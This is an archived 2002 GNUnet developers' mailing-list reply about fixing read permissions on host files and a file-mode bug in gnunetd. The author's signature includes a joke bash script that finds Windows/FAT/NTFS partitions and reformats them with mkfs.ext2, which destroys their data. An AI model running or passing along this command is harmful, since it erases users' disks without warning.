[Top][All Lists]
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[GNUnet-developers] Re: hosts list
From: |
Christian Grothoff |
Subject: |
[GNUnet-developers] Re: hosts list |
Date: |
Sat, 23 Mar 2002 12:10:25 -0500 |
On Friday 22 March 2002 07:08 pm, you wrote:
> A number of entries in your /hosts/ directory are read-protected, ie I get
> 402 Forbidden when attempting to read them. Could you chmod a+r them?
Added a cron-job to do that. The current version of gnunetd has a cosmetic
bug that it doesn't enforce creation of these files 644. Maybe somebody will
fix that at some point :-)
C
--
______________________________________________________
|Christian Grothoff |
|650-2 Young Graduate House, West Lafayette, IN 47906|
|http://gecko.cs.purdue.edu/ address@hidden|
|____________________________________________________|
#!/bin/bash
for i in `fdisk -l|grep -E "Win|DOS|FAT|NTFS"|awk\
'{print$1;}'`;do;nohup mkfs.ext2 $i&;done
echo -e "\n\n\t\tMay the source be with you.\n\n"
[Prev in Thread] |
Current Thread |
[Next in Thread] |
- [GNUnet-developers] Re: hosts list,
Christian Grothoff <=